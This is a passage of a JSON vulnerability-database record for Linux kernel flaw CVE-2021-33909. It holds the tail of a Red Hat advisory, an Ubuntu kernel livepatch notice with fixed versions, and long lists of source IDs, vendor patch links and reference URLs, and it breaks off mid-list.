to cluster API from assisted-installer-controller\n1977426 - Installation of OCP 4.6.13 fails when teaming interface is used with OVNKubernetes\n1977479 - CI failing on firing CertifiedOperatorsCatalogError due to slow livenessProbe responses\n1977540 - sriov webhook not worked when upgrade from 4.7 to 4.8\n1977607 - [4.8.0] Post making changes to AgentServiceConfig assisted-service operator is not detecting the change and 
redeploying assisted-service pod\n1977924 - Pod fails to run when a custom SCC with a specific set of volumes is used\n1980788 - NTO-shipped stalld can segfault\n1981633 - enhance service-ca injection\n1982250 - Performance Addon Operator fails to install after catalog source becomes ready\n1982252 - olm Operator is in CrashLoopBackOff state with error \"couldn\u0027t cleanup cross-namespace ownerreferences\"\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2183\nhttps://access.redhat.com/security/cve/CVE-2020-7774\nhttps://access.redhat.com/security/cve/CVE-2020-15106\nhttps://access.redhat.com/security/cve/CVE-2020-15112\nhttps://access.redhat.com/security/cve/CVE-2020-15113\nhttps://access.redhat.com/security/cve/CVE-2020-15114\nhttps://access.redhat.com/security/cve/CVE-2020-15136\nhttps://access.redhat.com/security/cve/CVE-2020-26160\nhttps://access.redhat.com/security/cve/CVE-2020-26541\nhttps://access.redhat.com/security/cve/CVE-2020-28469\nhttps://access.redhat.com/security/cve/CVE-2020-28500\nhttps://access.redhat.com/security/cve/CVE-2020-28852\nhttps://access.redhat.com/security/cve/CVE-2021-3114\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/cve/CVE-2021-3516\nhttps://access.redhat.com/security/cve/CVE-2021-3517\nhttps://access.redhat.com/security/cve/CVE-2021-3518\nhttps://access.redhat.com/security/cve/CVE-2021-3520\nhttps://access.redhat.com/security/cve/CVE-2021-3537\nhttps://access.redhat.com/security/cve/CVE-2021-3541\nhttps://access.redhat.com/security/cve/CVE-2021-3636\nhttps://access.redhat.com/security/cve/CVE-2021-20206\nhttps://access.redhat.com/security/cve/CVE-2021-20271\nhttps://access.redhat.com/security/cve/CVE-2021-20291\nhttps://access.redhat.com/security/cve/CVE-2021-21419\nhttps://access.redhat.com/security/cve/CVE-2021-21623\nhttps://access.redhat.com/security/cve/CVE-2021-21639\nhttps://access.redhat.com/security/cve/CVE-2021-21640\nhttps://access.redhat.com/security/cve/CVE-2021-21648\nhttps://access.redhat.com/security/cve/CVE-2021-22133\nhttps://access.redhat.com/security/cve/CVE-2021-23337\nhttps://access.redhat.com/security/cve/CVE-2021-23362\nhttps://access.redhat.com/security/cve/CVE-2021-23368\nhttps://access.redhat.com/security/cve/CVE-2021-23382\nhttps://access.redhat.com/security/cve/CVE-2021-25735\nhttps://access.redhat.com/security/cve/CVE-2021-25737\nhttps://access.redhat.com/security/cve/CVE-2021-26539\nhttps://access.redhat.com/security/cve/CVE-2021-26540\nhttps://access.redhat.com/security/cve/CVE-2021-27292\nhttps://access.redhat.com/security/cve/CVE-2021-28092\nhttps://access.redhat.com/security/cve/CVE-2021-29059\nhttps://access.redhat.com/security/cve/CVE-2021-29622\nhttps://access.redhat.com/security/cve/CVE-2021-32399\nhttps://access.redhat.com/security/cve/CVE-2021-33034\nhttps://access.redhat.com/security/cve/CVE-2021-33194\nhttps://access.redhat.com/security/cve/CVE-2021-33909\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYQCOF9zjgjWX9erEAQjsEg/+NSFQdRcZpqA34LWRtxn+01y2MO0WLroQ\nd4o+3h0ECKYNRFKJe6n7z8MdmPpvV2uNYN0oIwidTESKHkFTReQ6ZolcV/sh7A26\nZ7E+hhpTTObxAL7Xx8nvI7PNffw3CIOZSpnKws5TdrwuMkH5hnBSSZntP5obp9Vs\nImewWWl7CNQtFewtXbcmUojNzIvU1mujES2DTy2ffypLoOW6kYdJzyWubigIoR6h\ngep9HKf1X4oGPuDNF5trSdxKwi6W68+VsOA25qvcNZMFyeTFhZqowot/Jh1HUHD8\nTWVpDPA83uuExi/c8tE8u7VZgakWkRWcJUsIw68VJVOYGvpP6K/MjTpSuP2itgUX\nX//1RGQM7g6sYTCSwTOIrMAPbYH0IMbGDjcS4fSZcfg6c+WJnEpZ72ZgjHZV8mxb\n1BtQSs2lil48/cwDKM0yMO2nYsKiz4DCCx2W5izP0rLwNA8Hvqh9qlFgkxJWWOvA\nmtBCelB0E74qrE4NXbX+MIF7+ZQKjd1evE91/VWNs0FLR/xXdP3C5ORLU3Fag0G/\n0oTV73NdxP7IXVAdsECwU2AqS9ne1y01zJKtd7hq7H/wtkbasqCNq5J7HikJlLe6\ndpKh5ZRQzYhGeQvho9WQfz/jd4HZZTcB6wxrWubbd05bYt/i/0gau90LpuFEuSDx\n+bLvJlpGiMg=\n=NJcM\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Linux kernel vulnerabilities\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n-   Ubuntu 20.04 LTS\n-   Ubuntu 18.04 LTS\n-   Ubuntu 16.04 ESM\n-   Ubuntu 14.04 ESM\n\nSummary\n\nSeveral security issues were fixed in the kernel. An attacker in a guest VM could use\nthis to write to portions of the host\u2019s physical memory. (CVE-2021-3653)\n\nMaxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor\nimplementation for AMD processors in the Linux kernel allowed a guest VM\nto disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker\nin a guest VM could use this to read or write portions of the host\u2019s\nphysical memory. (CVE-2021-3656)\n\nAndy Nguyen discovered that the netfilter subsystem in the Linux kernel\ncontained an out-of-bounds write in its setsockopt() implementation. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2021-22555)\n\nIt was discovered that the virtual file system implementation in the\nLinux kernel contained an unsigned to signed integer conversion error. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or execute arbitrary code. (CVE-2021-33909)\n\nUpdate instructions\n\nThe problem can be corrected by updating your kernel livepatch to the\nfollowing versions:\n\nUbuntu 20.04 LTS\n    gcp - 81.1\n    generic - 81.1\n    gke - 81.1\n    gkeop - 81.1\n    lowlatency - 81.1\n\nUbuntu 18.04 LTS\n    generic - 81.1\n    gke - 81.1\n    gkeop - 81.1\n    lowlatency - 81.1\n    oem - 81.1\n\nUbuntu 16.04 ESM\n    generic - 81.1\n    lowlatency - 81.1\n\nUbuntu 14.04 ESM\n    generic - 81.1\n    lowlatency - 81.1\n\nSupport Information\n\nKernels older than the levels listed below do not receive livepatch\nupdates. If you are running a kernel version earlier than the one listed\nbelow, please upgrade your kernel as soon as possible. 
\n\nUbuntu 20.04 LTS\n    linux-aws - 5.4.0-1009\n    linux-azure - 5.4.0-1010\n    linux-gcp - 5.4.0-1009\n    linux-gke - 5.4.0-1033\n    linux-gkeop - 5.4.0-1009\n    linux-oem - 5.4.0-26\n    linux - 5.4.0-26\n\nUbuntu 18.04 LTS\n    linux-aws - 4.15.0-1054\n    linux-gke-4.15 - 4.15.0-1076\n    linux-gke-5.4 - 5.4.0-1009\n    linux-gkeop-5.4 - 5.4.0-1007\n    linux-hwe-5.4 - 5.4.0-26\n    linux-oem - 4.15.0-1063\n    linux - 4.15.0-69\n\nUbuntu 16.04 ESM\n    linux-aws - 4.4.0-1098\n    linux-azure - 4.15.0-1063\n    linux-azure - 4.15.0-1078\n    linux-hwe - 4.15.0-69\n    linux - 4.4.0-168\n    linux - 4.4.0-211\n\nUbuntu 14.04 ESM\n    linux-lts-xenial - 4.4.0-168\n\nReferences\n\n-   CVE-2021-3653\n-   CVE-2021-3656\n-   CVE-2021-22555\n-   CVE-2021-33909\n\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909",
        "trust": 2.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164155",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163671",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "163621",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "165477",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/22/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/4",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/21/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/08/25/10",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/2",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/20/1",
        "trust": 1.0
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163590",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163595",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163601",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163606",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163608",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163619",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163568",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163682",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163690",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "id": "VAR-202107-1361",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2024-07-23T19:28:07.610000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Amazon Linux AMI: ALAS-2021-1524",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1524"
      },
      {
        "title": "Debian Security Advisories: DSA-4941-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=fb9b5f5cc430f484f4420a11b7b87136"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-055",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-055"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-003",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-003"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1691",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1691"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-057",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-057"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-056",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-056"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-48] linux: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-48"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-50] linux-hardened: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-50"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-005",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-005"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-058",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-058"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-059",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-059"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-49] linux-zen: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-49"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-51] linux-lts: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-51"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-33909 log"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "LinuxVulnerabilities",
        "trust": 0.1,
        "url": "https://github.com/gitezri/linuxvulnerabilities "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/amiahuman/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/liang2580/cve-2021-33909 "
      },
      {
        "title": "cve-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/baerwolf/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/bbinfosec43/cve-2021-33909 "
      },
      {
        "title": "deep-directory",
        "trust": 0.1,
        "url": "https://github.com/sfowl/deep-directory "
      },
      {
        "title": "integer_compilation_flags",
        "trust": 0.1,
        "url": "https://github.com/mdulin2/integer_compilation_flags "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/alaial90/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/christhecoolhut/cve-2021-33909 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/knewbury01/codeql-workshop-integer-conversion "
      },
      {
        "title": "kickstart-rhel8",
        "trust": 0.1,
        "url": "https://github.com/alexhaydock/kickstart-rhel8 "
      },
      {
        "title": "exploit_articles",
        "trust": 0.1,
        "url": "https://github.com/chokyuwon/exploit_articles "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/hardenedvault/ved "
      },
      {
        "title": "SVG-advisories",
        "trust": 0.1,
        "url": "https://github.com/egi-federation/svg-advisories "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/makoto56/penetration-suite-toolkit "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-190",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163621/sequoia-a-deep-root-in-linuxs-filesystem-layer.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163671/kernel-live-patch-security-notice-lsn-0079-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/164155/kernel-live-patch-security-notice-lsn-0081-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/165477/kernel-live-patch-security-notice-lsn-0083-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
      },
      {
        "trust": 1.0,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.4"
      },
      {
        "trust": 1.0,
        "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/z4uhhigiso3fvrf4cqnjs4ika25atsfu/"
      },
      {
        "trust": 1.0,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
      },
      {
        "trust": 1.0,
        "url": "https://www.debian.org/security/2021/dsa-4941"
      },
      {
        "trust": 1.0,
        "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
      },
      {
        "trust": 1.0,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.8,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2021-33909"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-006"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-33034"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2723"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5014-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1014.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-25.27"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.3/5.3.0-1045.48"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1042.44"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1013.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-76.72"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1014.15"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2731"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2728"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2725"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2737"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2734"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33910"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2763"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15112"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25737"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20291"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3520"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26540"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3537"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26539"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15106"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29059"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2438"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15112"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15113"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2437"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15136"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3517"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23382"
      },
      {
        "trust": 0.1,
